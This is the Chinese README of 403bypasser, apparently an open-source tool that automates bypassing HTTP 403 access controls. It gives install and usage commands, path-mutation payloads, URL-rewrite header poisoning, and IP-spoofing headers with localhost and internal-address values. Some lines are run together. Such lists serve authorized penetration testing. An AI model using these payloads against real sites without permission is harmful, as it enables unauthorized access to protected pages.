
403bypasser 自动化了用于绕过目标页面访问控制限制的技术。此工具将继续开发,欢迎贡献。
403bypasser 自动化了用于绕过目标页面访问控制限制的技术。403bypasser 将持续改进,并欢迎贡献。
git clone https://github.com/yunemse48/403bypasser.gitpip install -r requirements.txt 安装所需模块。参数:
用法1: python3 403bypasser.py -u https://example.com -d /secret
用法2: python3 403bypasser.py -u https://example.com -D dirlist.txt
用法3: python3 403bypasser.py -U urllist.txt -d /secret
用法4: python3 403bypasser.py -U urllist.txt -D dirlist.txt
重要提示: 以下所有用法都以相同方式解释。因此,使用哪种模式只是个人偏好的问题。
python3 403bypasser.py -u https://example.com -d secretpython3 403bypasser.py -u https://example.com -d /secretpython3 403bypasser.py -u https://example.com -d /secret/python3 403bypasser.py -u https://example.com -d secret/python3 403bypasser.py -u https://example.com/ -d secret由于Python是一种跨平台语言,可以在不同的操作系统上运行此程序。
程序的输出(在当前目录下)保存为以输入的域名命名的文件中。
例如:
运行 python3 403bypasser.py -u https://example.com -d /secret。那么输出将保存到当前目录下的 example.txt 中。
v2.0 变更: 此版本做了重大改动。项目已完全从Bash迁移到Python 3。添加了多种新技术。
v1.1 变更: 现在可以通过参数将文件(列表)作为输入传递给403bypasser。此外,新增了两个测试案例:
使用 X-Original-URL 和 X-Rewrite-URL 标头进行毒化。
/%2e/secret/secret//secret..;//secret/..;//secret%20/secret%09/secret%00/secret.json/secret.css/secret.html/secret?/secret??/secret???/secret?testparamX-Original-URL: /secretX-Rewrite-URL: /secret标头:
X-Custom-IP-AuthorizationX-Forwarded-ForX-Forward-ForX-Remote-IPX-Originating-IPX-Remote-AddrX-Client-IPX-Real-IP值:
localhostlocalhost:80localhost:443127.0.0.1127.0.0.1:80127.0.0.1:44321307064330x7F0000010177.0000.0000.00010127.110.0.0.010.0.0.1172.16.0.0| 参数 | 描述 | 示例 | 备注 |
|---|
| -u | 要扫描的单个URL | http://example.com 或 http://example.com/ | 所有这些示例用法都以相同方式解析 |
| -U | URL列表的路径 | ./urllist.txt, ../../urllist.txt 等 | 只需提供文件所在的路径 :) |
| -d | 要扫描的单个目录 | admin 或 /admin 或 admin/ 或 /admin/ | 所有这些示例用法都以相同方式解释 |
| -D | 目录列表的路径 | ./dirlist.txt, ../../dirlist.txt 等 | 只需提供文件所在的路径 :) |
/secret#/secret#test/secret/.//secret///./secret/./172.16.0.1192.168.1.0192.168.1.1